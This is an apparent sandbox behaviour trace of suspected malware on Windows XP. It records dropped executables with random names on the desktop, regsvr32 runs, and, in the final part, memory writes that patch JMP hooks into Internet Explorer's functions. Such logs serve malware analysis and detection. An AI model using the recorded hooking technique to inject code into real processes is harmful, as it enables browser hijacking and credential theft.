Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2518294683
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2518298130
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 270336 Protection: execute Mapped to pid: own pid success or wait 2518302119
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: query and read Type: commit Baseaddress: 7830000 Size: 270336 Protection: readonly Mapped to pid: own pid success or wait 2518307472
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 270336 Protection: execute Mapped to pid: own pid success or wait 2518313917
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: query and read Type: commit Baseaddress: 7830000 Size: 270336 Protection: readonly Mapped to pid: own pid success or wait 2518317424
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 167936 Protection: execute Mapped to pid: own pid success or wait 2518321768
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: query and read Type: commit Baseaddress: 7000000 Size: 167936 Protection: readonly Mapped to pid: own pid success or wait 2518327696
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 167936 Protection: execute Mapped to pid: own pid success or wait 2518333412
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: query and read Type: commit Baseaddress: 7000000 Size: 167936 Protection: readonly Mapped to pid: own pid success or wait 2518336810
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 184320 Protection: execute Mapped to pid: own pid success or wait 2518340952
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: query and read Type: commit Baseaddress: 7000000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 2518346169
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 184320 Protection: execute Mapped to pid: own pid success or wait 2518353533
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: query and read Type: commit Baseaddress: 7000000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 2518356989
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadco.dll Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 143360 Protection: execute Mapped to pid: own pid success or wait 2518535083
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadco.dll Access: query and write and read and execute Type: image Baseaddress: 4DDF0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2518541123
Section loaded Path: \KnownDlls\MSDART.DLL Access: write and read and execute Type: unknown Baseaddress: 4DDF0000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 2518565019
Section loaded Path: C:\WINDOWS\system32\msdart.dll Access: query and write and read and execute Type: image Baseaddress: 765B0000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2518568278
Section loaded Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: unknown Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2518678899
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadco.dll Access: query and read Type: commit Baseaddress: 7000000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2518857475
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadcor.dll Access: write and read and execute Type: commit Baseaddress: 7010000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2518868908
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadcor.dll Access: query and write and read and execute Type: image Baseaddress: 7010000 Size: 16384 Protection: read write Mapped to pid: own pid conflicting addresses 2518874158
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 100b8, 100b6, 1, 64415c73, 696e696d, 61727473, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2519325688
Section loaded Path: \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520807080
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB..AJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520863969
Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.ABH Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7D30000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 2520888532
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.B.AJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520889622
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.C.AJGKK Access: query and write and read Type: commit Baseaddress: 7DB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520890686
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.D.AJGKK Access: query and write and read Type: commit Baseaddress: 7DC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520891685
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.E.PJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520904912
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.F.PJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520921425
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.G.PJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520924734
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.LB.PJGKK Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520928390
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.MB.PJGKK Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520929338
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.NB.PJGKK Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520930237
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\net.dll Access: write and read and execute Type: commit Baseaddress: 7DB0000 Size: 81920 Protection: execute Mapped to pid: own pid success or wait 2522559365
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\net.dll Access: query and write and read and execute Type: image Baseaddress: 6D4C0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2522595702
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\dcpr.dll Access: write and read and execute Type: commit Baseaddress: 7FB0000 Size: 147456 Protection: execute Mapped to pid: own pid success or wait 2530307854
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\dcpr.dll Access: query and write and read and execute Type: image Baseaddress: 6D1C0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2530313645
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE Access: query and read Type: commit Baseaddress: 81B0000 Size: 10084352 Protection: readonly Mapped to pid: own pid success or wait 2531215611
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE Access: query and read Type: commit Baseaddress: 81B0000 Size: 10084352 Protection: readonly Mapped to pid: own pid success or wait 2531241094
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE Access: query and read Type: commit Baseaddress: 81B0000 Size: 10084352 Protection: readonly Mapped to pid: own pid success or wait 2531250072
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE Access: query and read Type: commit Baseaddress: 81B0000 Size: 10084352 Protection: readonly Mapped to pid: own pid success or wait 2531264020
Section loaded Path: \BaseNamedObjects\Global\RotHintTable Access: read Type: unknown Baseaddress: 7FD0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2531296618
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2532499209
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535090595
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120120111202_index.dat_16384 Access: write Type: unknown Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid object name not found 2535107362
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120120111202_index.dat_16384 Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2535107629
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FF0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535108386
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535133895
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535135762
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120220111203_index.dat_32768 Access: write Type: unknown Baseaddress: 7FE0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2535287586
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_16384 Access: write Type: unknown Baseaddress: 7FE0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2535337426
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_16384 Access: query and write and read Type: commit Baseaddress: 7FF0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2535337695
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_32768 Access: write Type: unknown Baseaddress: 7FF0000 Size: 16384 Protection: read write Mapped to pid: own pid object name not found 2535340312
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_32768 Access: query and write and read Type: commit Baseaddress: 7FF0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2535340587
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535341451
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535402985
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535404088
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_16384 Access: write Type: unknown Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid object name not found 2535562030
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_16384 Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2535562282
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_32768 Access: write Type: unknown Baseaddress: 7FE0000 Size: 16384 Protection: read write Mapped to pid: own pid object name not found 2535565316
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_32768 Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2535565569
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535569460
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535572587
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535574751
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2535575780
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2535576801
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2535581419
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2535582364
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535583296
Section loaded Path: \BaseNamedObjects\ASMWIN0 Access: write and read Type: unknown Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535599011
Section loaded Path: \BaseNamedObjects\ASMWIN1 Access: write and read Type: unknown Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535740662
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2536085947
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2536087225
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2536088489
Section loaded Path: \BaseNamedObjects\ASMWIN2 Access: write and read Type: unknown Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2539074747
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\nio.dll Access: write and read and execute Type: commit Baseaddress: 8000000 Size: 40960 Protection: execute Mapped to pid: own pid success or wait 2552457412
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\nio.dll Access: query and write and read and execute Type: image Baseaddress: 6D4E0000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2552510265
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 6D4E0000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2570565069
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8100000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2570842702
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and read Type: commit Baseaddress: 8100000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2570919162
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 8100000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2573692538
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8100000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2573725726
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 8230000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2573812480
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8230000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2573818352
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 8240000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2574174144
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8230000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2574185916
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8100000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2574194589
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.3635417184612467.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 8100000 Size: 12288 Protection: readonly Mapped to pid: own pid invalid file for section 2579839292
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 8100000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2579857381
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8100000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2579859301
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 8230000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2579884425
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8230000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2579889032
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 8230000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2579892551
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8100000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2579895836
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8100000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2579904336
Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.MMB Access: query and write and read Type: reserve Baseaddress: 8100000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 2584466359
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2584529778
Memory allocated PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8080000 Length: 807F8C8 Allocation Type: null Protection: page read and write success or wait 2654590104
Memory allocated PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8080000 Length: 807F8CC Allocation Type: null Protection: page read and write success or wait 2654590391
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2658025341
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: Enabled object name not found 2658027591
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: EnabledV8 success or wait 2658028174
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: CleanCookies success or wait 2658028732
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: CleanCookies success or wait 2658029293
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658029977
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658030568
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658031152
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658031731
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658032317
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658032893
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658033477
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658034059
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658034646
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658035223
Memory allocated PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190000 Length: 807F4C0 Allocation Type: null Protection: page execute and read and write success or wait 2658035884
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658039511
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2658039873
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 77 74 success or wait 2658040850
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 70 8B success or wait 2658041850
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658042171
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658044516
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2658044873
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 78 74 success or wait 2658045863
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C91632D Length: 5 Value: E9 09 1F 70 8B success or wait 2658046801
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658047121
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658048147
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2658048511
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 08 6F success or wait 2658049555
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212EBC Length: 5 Value: E9 FD 4B DF 90 success or wait 2658050491
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658051016
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658053207
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2658053632
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 03 6F success or wait 2658054620
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A E4 90 success or wait 2658055558
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658055878
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658057916
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2658058333
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 03 6F success or wait 2658059315
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 E3 90 success or wait 2658060247
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658060565
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658061558
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2658061856
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 08 6F success or wait 2658062829
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C DF 90 success or wait 2658063757
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212FC1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658064022
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658066087
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2658066502
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 03 6F success or wait 2658067538
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C4D8C Length: 5 Value: E9 25 2F E4 90 success or wait 2658068465
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C4D8C Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658068781
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658070845
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2658071260
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 03 6F success or wait 2658072546
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C82EA Length: 5 Value: E9 0A FA E3 90 success or wait 2658073485
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C82EA Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658073805
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658075195
